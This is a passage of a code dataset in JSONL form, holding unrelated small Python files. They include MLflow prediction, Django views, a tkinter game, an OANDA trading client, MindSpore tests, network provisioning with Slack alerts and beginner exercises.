http://localhost:5000/#/models\nmodel_name = \"spark-random-forest-reg-model\"\nmodel_version = 3\n\nmodel = mlflow.pyfunc.load_model(\n model_uri=f\"models:/{model_name}/{model_version}\"\n)\n# data should be pandas dataframe\nprint(model.predict(data=data))\n# Expected output\n# [21.554416629994716, 11.217042979152959, 12.242694120291947, 18.38443154761905, 13.517194939980039]\n","sub_path":"mlflow/play/spark_advertsing_regression/batch_prediction.py","file_name":"batch_prediction.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"325238432","text":"class Solution:\n def maxSubArray(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n # input:[-2,1,-3,4,-1,2,1,-5,4]\n # output:6\n # [4,-1,2,1]\n res = nums[0]\n total = 0\n for i, c in enumerate(nums):\n if total > 0:\n total += c\n else:\n total = c\n res = max(res, total)\n\n return res","sub_path":"53_maxSubArray.py","file_name":"53_maxSubArray.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"164478095","text":"\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jun 20 13:24:00 2019\r\n\r\n@author: vaibhav\r\n\"\"\"\r\nimport cv2\r\n\r\nx = cv2.imread(\"rect.jpg\",0)\r\nr,y=cv2.threshold(x,100,255,cv2.THRESH_BINARY_INV)\r\nc,a= cv2.findContours(y,cv2.RETR_TREE,cv2.CHAIN_APPROX_SIMPLE)\r\n\r\n\r\ncv2.rectangle(x,tuple(c[0][0][0]),tuple(c[0][2][0]),(160,56,80),5)\r\n\r\n#cv2.imshow(\"rect\",u)\r\ncv2.imshow(\"original\",x)\r\ncv2.imshow(\"thres\",y)\r\n\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","sub_path":"rect_detection.py","file_name":"rect_detection.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"265255360","text":"from .models import *\nfrom .forms import *\nfrom django.shortcuts import render, redirect\nfrom django.core.mail import send_mail, BadHeaderError\nfrom django.http import HttpResponse\n\ndef home(request):\n books = Book.objects.all()\n\n form = BookForm()\n if request.method =='POST':\n form = BookForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n context = {\"books\":books, 'form':form}\n return render(request, \"homepage.html\", context)\n\ndef updateBook(request, pk):\n book = Book.objects.get(id=pk)\n\n form = BookForm(instance=book)\n\n if request.method == 'POST':\n form = BookForm(request.POST, instance=book)\n if form.is_valid():\n form.save()\n return redirect('/')\n\n context = {'form':form}\n\n return render(request, 'update_book.html', context)\n\ndef deleteBook(request, pk):\n book = Book.objects.get(id=pk)\n context = {'book':book}\n\n if request.method == 'POST':\n book.delete()\n return redirect('/')\n\n return render(request, 'delete_book.html', context)\n\ndef previewBook(request, pk):\n book = Book.objects.get(id=pk)\n context = {'bookp':book}\n\n return render(request, 'preview_book.html', context)\n\ndef contactView(request):\n if request.method == 'GET':\n formC = ContactForm()\n else:\n formC = ContactForm(request.POST)\n if formC.is_valid():\n subject = formC.cleaned_data['subject']\n from_email = formC.cleaned_data['from_email']\n message = formC.cleaned_data['message']\n try:\n send_mail(subject, message, from_email, ['admin@example.123'])\n except BadHeaderError:\n return HttpResponse('Invalid header found.')\n return redirect('home')\n return render(request, \"email.html\", {'formC': formC})\n","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"179485009","text":"from random import choice, randint as rnd\n\nfrom tkinter import Tk, Canvas, BOTH, mainloop, CENTER, Frame\n\nroot = Tk()\nfr = Frame(root)\nroot.geometry('730x600')\ncanvas = Canvas(root, bg='white')\ncanvas.pack(fill=BOTH, expand=1)\nspeed = 1\ndT = 10\n\n\nclass Ball:\n def __init__(self):\n self.x = 0\n self.y = 0\n self.elastic = 0\n self.g = 0\n self.live = 0\n self.r = 0\n self.vx = 0\n self.vy = 0\n self.color = choice(['blue', 'green', 'red', 'brown'])\n self.id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.color)\n\n def appear(self, x, y, vx, vy):\n self.x = x\n self.y = y\n self.elastic = 0.6\n self.g = 0.1\n self.live = 1000\n self.r = 10\n self.vx = vx\n self.vy = vy\n self.color = choice(['blue', 'green', 'red', 'brown'])\n self.id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.color)\n\n def move(self, fild):\n canvas.delete(self.id)\n\n self.vy -= self.g\n min_range_1 = self.r\n min_range_2 = self.r\n min_index_1 = -1\n min_index_2 = -1\n\n for point in fild:\n x = point[0]\n y = point[1]\n dx = x - self.x\n dy = y - self.y\n\n if dx ** 2 + dy ** 2 < min_range_1 ** 2:\n min_range_2 = min_range_1\n min_range_1 = (dx ** 2 + dy ** 2) ** 0.5\n min_index_2 = min_index_1\n min_index_1 = fild.index(point)\n elif dx ** 2 + dy ** 2 < min_range_2 ** 2:\n min_range_2 = (dx ** 2 + dy ** 2) ** 0.5\n min_index_2 = fild.index(point)\n\n if min_index_1 != -1 and min_index_2 != -1:\n min_numb = min(min_index_1, min_index_2)\n max_numb = max(min_index_1, min_index_2)\n y1 = fild[min_numb][1]\n y2 = fild[max_numb][1]\n x1 = fild[min_numb][0]\n x2 = fild[max_numb][0]\n\n if x2 - x1 == 0:\n cos_a = 0\n else:\n cos_a = (x2 - x1) / ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n if y2 - y1 == 0:\n sin_a = 0\n else:\n sin_a = -(y2 - y1) / ((x2 - x1) ** 2 + (y2 - y1) ** 2) ** 0.5\n\n self.vy += self.g\n self.y += self.vy\n self.x -= self.vx\n self.vy *= self.elastic\n self.vx *= self.elastic\n instant_vx = self.vx\n self.vx = self.vx * cos_a + self.vy * sin_a\n self.vy = -instant_vx * sin_a + self.vy * cos_a\n self.vy *= -1\n self.vx = self.vx * cos_a - self.vy * sin_a\n self.vy = instant_vx * sin_a + self.vy * cos_a\n\n self.y -= self.vy\n self.x += self.vx\n\n if self.live <= 0:\n canvas.delete(self.id)\n else:\n self.live -= 1\n\n self.id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.color)\n\n\nclass Gun:\n def __init__(self, numb):\n self.energy = 3\n self.vx = 0\n self.vy = 0\n self.numb = numb\n self.live = 3\n self.r = 15\n self.x = rnd(20, 220) + 500 * numb # work only for 2 players\n self.y = 0\n self.len_x = 20\n self.len_y = 20\n self.colors = ['blue', 'green', 'red', 'brown']\n self.body_id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.colors[self.numb])\n\n self.gun_id = canvas.create_line(\n self.x,\n self.y,\n self.x + self.len_x,\n self.y - self.len_y,\n fill='black',\n width=7)\n\n def move(self, fild, power, cos_a, sin_a):\n touch = 0\n self.x += self.vx\n self.y += self.vy\n\n for point in fild:\n dx = self.x - point[0]\n dy = self.y - point[1]\n\n if dx ** 2 + dy ** 2 < self.r ** 2:\n touch = 1\n\n if touch == 0:\n self.vy += 0.1\n else:\n self.vy = 0\n self.vx = 0\n\n self.drowing(power, cos_a, sin_a)\n\n def move_left(self, event):\n if self.energy > 0:\n self.vx -= 2\n self.vy -= 2\n self.energy -= 1\n\n def move_right(self, event):\n if self.energy > 0:\n self.vx += 2\n self.vy -= 2\n self.energy -= 1\n\n def move_up(self, event):\n if self.energy > 0:\n self.vy -= 2\n self.energy -= 1\n\n def move_down(self, event):\n if self.energy > 0:\n self.vy += 2\n self.energy -= 1\n\n def drowing(self, power, cos_a, sin_a):\n canvas.delete(self.body_id)\n canvas.delete(self.gun_id)\n self.len_x = max(power, 3) * 10 * cos_a\n self.len_y = -max(power, 3) * 10 * sin_a\n\n self.body_id = canvas.create_oval(\n self.x - self.r,\n self.y - self.r,\n self.x + self.r,\n self.y + self.r,\n fill=self.colors[self.numb])\n\n if power != 0:\n self.gun_id = canvas.create_line(\n self.x,\n self.y,\n self.x + self.len_x,\n self.y - self.len_y,\n fill='orange',\n width=7)\n else:\n self.gun_id = canvas.create_line(\n self.x,\n self.y,\n self.x + self.len_x,\n self.y - self.len_y,\n fill='black',\n width=7)\n\n\nclass Game():\n def __init__(self):\n self.start_text = ''\n self.fild = [[10, 600]]\n self.is_fild = 0\n self.is_create = 0\n self.game_over = 0\n self.cos_a = 0\n self.sin_a = 0\n self.gun = []\n self.gun_numb = 2\n self.live_text = []\n self.turn = 1\n self.preparation = 0\n\n for numb in range(self.gun_numb):\n self.gun.append(Gun(numb))\n self.live_text.append('')\n\n self.angle = 0\n self.power = 0\n self.balls = []\n\n def hittest(self):\n for ball in self.balls:\n for numb in range(self.gun_numb):\n dx = ball.x - self.gun[numb].x\n dy = ball.y - self.gun[numb].y\n r = ball.r + self.gun[numb].r\n\n if dx ** 2 + dy ** 2 < r ** 2 and ball.live < 977:\n self.gun[numb].live -= 1\n canvas.delete(self.live_text[numb])\n self.live_text[numb] = canvas.create_text(\n 10 * (numb + 1),\n 10,\n text=self.gun[numb].live,\n justify=CENTER,\n font=\"Verdana 10\",\n fill=self.gun[numb].colors[numb])\n\n if self.gun[numb].live != 0:\n canvas.delete(ball.id)\n self.balls.pop(self.balls.index(ball))\n else:\n canvas.delete(self.gun[numb].gun_id)\n canvas.delete(self.gun[numb].body_id)\n\n if self.gun[numb].y > 600:\n self.gun[numb].live = 0\n\n def new_ball(self, event):\n self.balls.append(Ball())\n this_ball = self.balls[len(self.balls) - 1]\n vx = self.power * self.cos_a\n vy = self.power * self.sin_a\n a = self.gun_numb\n this_ball.appear(self.gun[self.turn % a].x, self.gun[self.turn % a].y, vx, -vy)\n self.power = 0\n self.preparation = 0\n self.gun[self.turn % a].energy = 3\n self.turn += 1\n\n def shot_prepair(self, event):\n self.preparation = 1\n\n def targetting(self, event):\n a = self.gun_numb\n dx = event.x - self.gun[self.turn % a].x\n dy = event.y - self.gun[self.turn % a].y\n\n if dx == 0:\n self.cos_a = 0\n else:\n self.cos_a = dx / (dx ** 2 + dy ** 2) ** 0.5\n\n if dy == 0:\n self.sin_a = 0\n else:\n self.sin_a = dy / (dx ** 2 + dy ** 2) ** 0.5\n\n def ball_to_old(self):\n numb = 0\n\n while numb < len(self.balls):\n self.balls[numb].move(self.fild)\n\n if self.balls[numb].live <= 0:\n canvas.delete(self.balls[numb].id)\n self.balls.pop(numb)\n\n numb += 1\n\n def power_up(self):\n if self.power < 15 and self.preparation == 1:\n self.power += 0.1\n\n def create_fild(self, event):\n if event.x < 10:\n self.is_fild = 1\n\n if event.x > 720:\n self.is_fild = -1\n self.fild.append([720, 600])\n canvas.create_polygon(self.fild)\n\n if self.is_fild == 1:\n self.fild.append([event.x, event.y])\n\n def main(self):\n canvas.delete(self.start_text)\n\n if self.is_fild != -1:\n self.start_text = canvas.create_text(\n 365,\n 300,\n text=\"для начала битвы, проведите слева направо мышкой\",\n justify=CENTER,\n font=\"Verdana 14\")\n\n canvas.bind('', self.create_fild)\n else:\n canvas.bind('', self.targetting)\n\n for numb in range(self.gun_numb):\n self.gun[numb].move(self.fild, self.power, self.cos_a, self.sin_a)\n\n canvas.bind('', self.shot_prepair)\n self.power_up()\n canvas.bind('', self.new_ball)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_up)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_down)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_left)\n canvas.bind('', self.gun[self.turn % self.gun_numb].move_right)\n self.ball_to_old()\n self.gun[self.turn % self.gun_numb].drowing(self.power, self.cos_a, self.sin_a)\n self.hittest()\n\n self.game_over = 0\n\n for numb in range(self.gun_numb):\n if self.gun[numb].live == 0:\n self.game_over = 1\n lost_numb = numb\n\n if self.game_over == 0:\n root.after(dT, self.main)\n else:\n canvas.create_text(\n 365,\n 300,\n text=str(lost_numb + 1)+\" player lost\",\n justify=CENTER,\n font=\"Verdana 30\",\n fill=self.gun[lost_numb].colors[lost_numb])\n\n\ngame = Game()\ngame.main()\nmainloop()\n","sub_path":"bettergun.py","file_name":"bettergun.py","file_ext":"py","file_size_in_byte":11255,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"390087611","text":"import requests\nimport json\nfrom currency.utils import Currency\nfrom currency.oanda.utils import Config, h\n\n\nclass Trade:\n def __init__(self, config: Config, currency: Currency, i: int, units: int = None, take: float = None, stop: float = None):\n self.id = i\n self.config = config\n self.currency = currency\n self.headers = h(config.beaver)\n self.units = units\n self.take = take\n self.stop = stop\n\n def __repr__(self):\n return f\"{self.id}|{self.currency}|{self.units}|{self.take}|{self.stop}\"\n\n @classmethod\n def create(cls, config: Config, currency: Currency, units: int, take: float, stop: float):\n url = f\"https://api-fxpractice.oanda.com/v3/accounts/{config.account}/orders\"\n data = {\n \"order\": {\n \"units\": units,\n \"instrument\": currency.oanda,\n \"type\": \"MARKET\",\n \"takeProfitOnFill\": {\n \"price\": str(round(take, 5))\n },\n \"stopLossOnFill\": {\n \"price\": str(round(stop, 5))\n }\n }\n }\n req = requests.post(url, headers=h(config.beaver), data=json.dumps(data)).json()\n return cls(config=config, currency=currency, i=req[\"orderFillTransaction\"][\"id\"], units=units, take=take, stop=stop)\n\n def close(self):\n url = f\"https://api-fxpractice.oanda.com/v3/accounts/{self.config.account}/trades/{self.id}/close\"\n req = requests.put(url=url, headers=self.headers)\n return req.json()\n\n#\n# if __name__ == '__main__':\n# c = Config.init_from_file()\n# # Trade.create(c, Currency(\"eur\"), 100000, 1.25, 1.09)\n# t = Trade(c, Currency(first=\"eur\", period=Daily(1)), 183)\n# pprint(t.close())\n","sub_path":"currency/oanda/trade.py","file_name":"trade.py","file_ext":"py","file_size_in_byte":1780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"151379321","text":"from time import time_ns\n\nfrom pyprocessing.utils import SingletonMeta\n\n\nclass RenderersDelegate:\n def __init__(self, renderers, render_attr):\n self.renderers = renderers\n self.render_attr = render_attr\n methods = (\n m\n for r in self.renderers\n for m in dir(getattr(r, render_attr))\n if not m.startswith('__')\n )\n for method in methods:\n if not hasattr(self, method):\n setattr(\n self, method,\n lambda *a, m=method, **kw: self.__delegate(\n m, *a, **kw\n )\n )\n\n def __delegate(self, mname, *args, **kwargs):\n print(mname, args, kwargs)\n for r in self.renderers:\n getattr(getattr(r, self.render_attr), mname)(*args, **kwargs)\n\n\nclass PyProcessing(metaclass=SingletonMeta):\n def __init__(self):\n self.width = 640\n self.height = 480\n self.start_time_ns = 0\n self.namespace = {}\n self.renderers = []\n\n def attach_renderer(self, renderer_class):\n renderer = renderer_class(self)\n renderer.init()\n self.renderers.append(renderer)\n\n def start(self):\n for renderer in self.renderers:\n renderer.start()\n self.start_time_ns = time_ns()\n\n @property\n def windows(self):\n return RenderersDelegate(self.renderers, 'window')\n","sub_path":"pyprocessing/pyprocessing.py","file_name":"pyprocessing.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"158993283","text":"from maml_zoo.envs.point_envs.point_env_2d import MetaPointEnv\nfrom maml_zoo.envs.mujoco_envs.half_cheetah_rand_direc import HalfCheetahRandDirecEnv\nfrom maml_zoo.envs.normalized_env import normalize\nfrom maml_zoo.meta_algos.trpo_dice_maml import TRPO_DICEMAML\nfrom maml_zoo.meta_trainer import Trainer\nfrom maml_zoo.samplers import MAMLSampler\nfrom maml_zoo.samplers import DiceMAMLSampleProcessor\nfrom maml_zoo.policies.meta_gaussian_mlp_policy import MetaGaussianMLPPolicy\nimport os\nfrom maml_zoo.logger import logger\nimport json\nimport numpy as np\n\n\nmaml_zoo_path = '/'.join(os.path.realpath(os.path.dirname(__file__)).split('/')[:-1])\n\n\ndef main(config):\n reward_baseline = LinearTimeBaseline()\n return_baseline = LinearFeatureBaseline()\n env = normalize(HalfCheetahRandDirecEnv())\n\n policy = MetaGaussianMLPPolicy(\n name=\"meta-policy\",\n obs_dim=np.prod(env.observation_space.shape),\n action_dim=np.prod(env.action_space.shape),\n meta_batch_size=config['meta_batch_size'],\n hidden_sizes=config['hidden_sizes'],\n )\n\n sampler = MAMLSampler(\n env=env,\n policy=policy,\n rollouts_per_meta_task=config['rollouts_per_meta_task'], # This batch_size is confusing\n meta_batch_size=config['meta_batch_size'],\n max_path_length=config['max_path_length'],\n parallel=config['parallel'],\n )\n\n sample_processor = DiceMAMLSampleProcessor(\n baseline=reward_baseline,\n max_path_length=config['max_path_length'],\n discount=config['discount'],\n normalize_adv=config['normalize_adv'],\n positive_adv=config['positive_adv'],\n return_baseline=return_baseline\n\n )\n\n algo = TRPO_DICEMAML(\n policy=policy,\n max_path_length=config['max_path_length'],\n meta_batch_size=config['meta_batch_size'],\n num_inner_grad_steps=config['num_inner_grad_steps'],\n inner_lr=config['inner_lr'],\n step_size=config['step_size']\n )\n\n trainer = Trainer(\n algo=algo,\n policy=policy,\n env=env,\n sampler=sampler,\n sample_processor=sample_processor,\n n_itr=config['n_itr'],\n num_inner_grad_steps=config['num_inner_grad_steps'], # This is repeated in MAMLPPO, it's confusing\n )\n trainer.train()\n\n\nif __name__==\"__main__\":\n idx = np.random.randint(0, 1000)\n logger.configure(dir=maml_zoo_path + '/data/vpg/test_%d' % idx, format_strs=['stdout', 'log', 'csv'],\n snapshot_mode='last_gap')\n config = json.load(open(maml_zoo_path + \"/configs/trpo_dice_maml_config.json\", 'r'))\n json.dump(config, open(maml_zoo_path + '/data/vpg/test_%d/params.json' % idx, 'w'))\n main(config)\n","sub_path":"run_scripts/trpo_dice_run.py","file_name":"trpo_dice_run.py","file_ext":"py","file_size_in_byte":2734,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"389462929","text":"# Copyright 2022 Huawei Technologies Co., Ltd\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\nimport numpy as np\nimport pytest\nimport mindspore as ms\nimport mindspore.nn as nn\nfrom mindspore import Tensor\nfrom mindspore import ops\n\n\nclass Net(nn.Cell):\n def construct(self, x):\n return ops.slogdet(x)\n\n\n@pytest.mark.level1\n@pytest.mark.platform_x86_cpu\n@pytest.mark.platform_arm_cpu\n@pytest.mark.platform_x86_gpu_training\n@pytest.mark.platform_arm_ascend_training\n@pytest.mark.platform_x86_ascend_training\n@pytest.mark.env_onecard\n@pytest.mark.parametrize('mode', [ms.GRAPH_MODE, ms.PYNATIVE_MODE])\ndef test_slogdet(mode):\n \"\"\"\n Feature: slogdet\n Description: Verify the result of slogdet\n Expectation: success\n \"\"\"\n ms.set_context(mode=mode)\n x = Tensor([[-1.8297, -0.8474, 1.0292], [-1.2167, 0.5574, -0.6753], [-0.6702, 0.2276, 1.2421]])\n net = Net()\n output1, output2 = net(x)\n expect_output1 = np.array(-1, dtype=np.float32)\n expect_output2 = np.array(1.13549, dtype=np.float32)\n assert np.allclose(output1.asnumpy(), expect_output1)\n assert np.allclose(output2.asnumpy(), expect_output2)\n\n\n@pytest.mark.level1\n@pytest.mark.platform_x86_cpu\n@pytest.mark.platform_arm_cpu\n@pytest.mark.platform_x86_gpu_training\n@pytest.mark.env_onecard\n@pytest.mark.parametrize('mode', [ms.GRAPH_MODE, ms.PYNATIVE_MODE])\ndef test_slogdet_complex(mode):\n \"\"\"\n Feature: slogdet\n Description: Verify the result of slogdet\n Expectation: success\n \"\"\"\n ms.set_context(mode=mode)\n x = Tensor([[-1.5 + 7.8j, 3 + 5.75j, 2 + 2.4j],\n [-6.4 + 485.4j, 45 + 3.14j, 45 + 453j],\n [-3.5 + 5.8j, 63 + 12.75j, -5 + 6.4j]], dtype=ms.complex64)\n net = Net()\n output1, output2 = net(x)\n expect_output1 = np.array(0.749919+0.66153j, dtype=np.complex)\n expect_output2 = np.array(12.0614+0j, dtype=np.complex)\n assert np.allclose(output1.asnumpy(), expect_output1)\n assert np.allclose(output2.asnumpy(), expect_output2)\n","sub_path":"tests/st/ops/test_func_slogdet.py","file_name":"test_func_slogdet.py","file_ext":"py","file_size_in_byte":2572,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172868726","text":"from machine import Pin\nimport time\nimport display\nfrom display import oled\n\ntipka=Pin(12, Pin.IN)\ndisplay.init()\noled.fill(1)\noled.show()\ntime.sleep(1)\noled.fill(0)\noled.show()\ni=0\n\nwhile tipka.value():\n if i==60:\n i=0\n oled.fill(0)\n var = input()\n oled.text(var,0,i)\n oled.show()\n i=i+10\n","sub_path":"display.py","file_name":"display.py","file_ext":"py","file_size_in_byte":328,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"86471344","text":"from app.network import get_napalm_connection\nfrom app.notifications import notify_slack\n\n\ndef ztp_start(host, file):\n msg = '{} downloaded {}'.format(host, file)\n notify_slack(msg)\n dev = get_napalm_connection(host, 'ios')\n\n if dev:\n notify_slack('{} connection established'.format(host))\n else:\n notify_slack('{} connection failed, giving up'.format(host))\n return\n\n facts = dev.get_facts()\n\n notify_slack('{}: {}/{}'.format(host, facts['model'],\n facts['serial_number']))\n\n lldp = dev.get_lldp_neighbors()\n for interface in lldp:\n for neighbor in lldp[interface]:\n notify_slack('{}:{} -> {}: {}'.format(\n host, interface, neighbor['hostname'],\n neighbor['port']))\n\n dev.close()\n","sub_path":"tutorial/inventory/app/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"246820972","text":"from ...lib import *\n\nimport itertools\nimport os\n\n__MYDIR__ = os.path.abspath(os.path.dirname(__file__))\n__MYPARMS__ = list(\n itertools.product(\n [175, 176, 177],\n [143, 144, 145],\n [\"I420\", \"NV12\", \"YV12\", \"P010\", \"AYUV\", \"YUY2\", \"ARGB\", \"422H\", \"444P\",\n \"P210\", \"P410\"],\n )\n)\n\ndef gen_multiframe_from(infile, count):\n outfile = get_media()._test_artifact(os.path.basename(infile))\n with open(infile, \"rb\") as fd:\n data = fd.read()\n with open(outfile, \"wb\") as fd:\n for i in xrange(count):\n fd.write(data)\n return outfile\n\n@slash.parametrize((\"width\", \"height\", \"fmt\"), __MYPARMS__)\ndef test_get_framesize(width, height, fmt):\n asset = os.path.join(__MYDIR__, \"assets\", \"{}x{}.{}\").format(width, height, fmt)\n assert get_framesize(width, height, fmt) == os.stat(asset).st_size\n\n@slash.parametrize((\"width\", \"height\", \"fmt\"), __MYPARMS__)\ndef test_check_filesize(width, height, fmt):\n asset = os.path.join(__MYDIR__, \"assets\", \"{}x{}.{}\").format(width, height, fmt)\n\n # single frame\n frames = 1\n check_filesize(asset, width, height, frames, fmt)\n\n # multi-frame\n frames = 31\n check_filesize(\n gen_multiframe_from(asset, frames), width, height, frames, fmt)\n\n@slash.parametrize((\"width\", \"height\", \"fmt\"), __MYPARMS__)\ndef test_frame_reader(width, height, fmt):\n asset = os.path.join(__MYDIR__, \"assets\", \"{}x{}.{}\").format(width, height, fmt)\n frames = 27\n with open(gen_multiframe_from(asset, frames), \"rb\") as fd:\n size = get_framesize(width, height, fmt)\n for n in xrange(1, frames):\n y, u, v = FrameReaders[fmt](fd, width, height)\n assert fd.tell() == size * n\n","sub_path":"test/self/formats.py","file_name":"formats.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"172242938","text":"from rest_framework.status import HTTP_200_OK\n\nfrom common.tests import BaseAPITestCase\n\nfrom ..factories import ClassTimeFactory\nfrom ..models import Class, ClassTime\n\n\nclass RestAPIClassTimes(BaseAPITestCase):\n\n def setUp(self):\n super(RestAPIClassTimes, self).setUp()\n self.class_time = ClassTimeFactory()\n\n def test_get_class_times(self):\n url = self.reverse('class-times-detail', kwargs={'pk': self.class_time.id})\n response = self.client.get(url)\n\n self.assertEqual(response.status_code, HTTP_200_OK)\n\n def test_sync(self):\n Class.objects.filter(id=self.class_delphi.id).update(class_time=self.class_time)\n class_time = ClassTime.objects.get(id=self.class_time.id)\n class_time.number = 2\n class_time.save()\n\n url = self.reverse('class-times-sync')\n updated_ids = [class_time.id]\n deleted_ids = []\n\n self.init_sync(url, updated_ids, deleted_ids)\n\n def test_meta(self):\n class_times = ClassTime.objects.filter(class__timetable__subgroup__subscription__in=[self.subscription])\n url = self.reverse('class-times-meta')\n\n self.init_meta(url, class_times)\n","sub_path":"university/tests/test_class_times.py","file_name":"test_class_times.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"165233726","text":"def ganadorDeCampeonatoDeFutbol(encuentrosDeportivos):\n\n ganadorDelCampeonato = \"\"\n\n puntajeEquipos = {}\n\n if (len(encuentrosDeportivos) == 0):\n\n return ganadorDelCampeonato\n\n for partido in encuentrosDeportivos:\n\n if( len(partido) == 4 ):\n\n\n if( partido[1] < partido[3] ):\n\n puntajeEquipos.setdefault(partido[2],0)\n\n puntajeEquipos[partido[2]] = puntajeEquipos[partido[2]] + 2\n\n elif ( partido[1] > partido[3] ):\n\n puntajeEquipos.setdefault(partido[0],0)\n\n puntajeEquipos[partido[0]] = puntajeEquipos[partido[0]] + 2\n\n else:\n\n puntajeEquipos.setdefault(partido[2],0)\n\n puntajeEquipos[partido[2]] = puntajeEquipos[partido[2]] + 1\n\n puntajeEquipos.setdefault(partido[0],0)\n\n puntajeEquipos[partido[0]] = puntajeEquipos[partido[0]] + 1\n\n\n for equipo in puntajeEquipos:\n\n if( max(puntajeEquipos.values()) == puntajeEquipos.get(equipo) ):\n\n ganadorDelCampeonato = equipo\n\n return ganadorDelCampeonato\n\n\n\ndef ejercicio4(var1):\n return ganadorDeCampeonatoDeFutbol(var1)\n\ncampeonato = []\nprint(ejercicio4(campeonato)) # \"\"\n\ncampeonato = [(\"a\",1,\"b\",0)]\nprint(ejercicio4(campeonato)) # a\n\ncampeonato = [(\"a\",1,\"b\",0),(\"a\",1,\"c\",2),(\"c\",3,\"b\",0)]\nprint(ejercicio4(campeonato)) # c\n\ncampeonato = [(\"a\",1,\"b\",1),(\"a\",1,\"c\",1),(\"c\",1,\"b\",1)]\nprint(ejercicio4(campeonato)) # a b c (cualquiera de las 3)\n\ncampeonato = [(\"a\",1,\"b\",-2),(\"a\",1,\"c\",1),(\"c\",1,\"b\",1),(\"d\",1,\"a\",9)]\nprint(ejercicio4(campeonato)) # a","sub_path":"ejercicio4.py","file_name":"ejercicio4.py","file_ext":"py","file_size_in_byte":1604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"184882930","text":"# --------------\n# Code starts here\r\n\r\n# Create the lists \r\nclass_1 = ['Geoffrey Hinton','Andrew Ng','Sebastian Raschka','Yoshua Bengio']\r\nclass_2 = ['Hilary Mason','Carla Gentry','Corinna Cortes']\r\n# Concatenate both the strings\r\n\r\nnew_class = class_1 + class_2\r\nprint(new_class)\r\n# Append the list\r\nnew_class.append('Peter Warden')\r\n# Print updated list\r\n\r\nprint(new_class)\r\n# Remove the element from the list\r\nnew_class.pop(5)\r\n# Print the list\r\n\r\nprint(new_class)\r\n\r\n# Create the Dictionary\r\n\r\ncourses = {'Math': 65, 'English': 70, 'History': 80, 'French': 70, 'Science': 60}\r\n\r\n# Store the all the subject in one variable `Total`\r\nTotal = 65 + 70 + 80 + 70 + 60\r\n# Print the total\r\nprint(Total)\r\n# Insert percentage formula\r\npercentage = (Total / len(courses)) * 100\r\n# Print the percentage\r\nprint(percentage)\r\n\r\n# Create the Dictionary\r\n \r\nmathematics = {'Geoffrey Hinton': 78,\r\n'Andrew Ng': 95,\r\n'Sebastian Raschka': 65,\r\n'Yoshua Benjio': 50,\r\n'Hilary Mason':\t70,\r\n'Corinna Cortes': 66,\r\n'Peter Warden':\t75}\r\n\r\n# Given string\r\n\r\ntopper = max(mathematics,key = mathematics.get)\r\nprint (topper)\r\n# Create variable first_name \r\nprint('-'*20)\r\nfirst_name = topper.split()[0]\r\nprint(first_name)\r\n# Create variable Last_name and store last two element in the list\r\nlast_name = topper.split()[1]\r\nprint(last_name)\r\nfull_name = []\r\n# Concatenate the string\r\nfull_name = first_name + ' ' + last_name\r\n# print the full_name\r\nprint(full_name)\r\n# print the name in upper case\r\nfull_name.upper()\r\nprint(full_name)\r\ncertificate_name = 'NG ANDREW'\r\nprint(certificate_name)\r\n# Code ends here\n\n\n","sub_path":"Student-Management-Project/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"} +{"seq_id":"38987766","text":"import sys\nsys.path.append('../graph')\n\nfrom util import Stack, Queue\n\nfrom room import Room\nfrom player import Player\nfrom world import World\n\nimport random\nfrom ast import literal_eval\n\n# Load world\nworld = 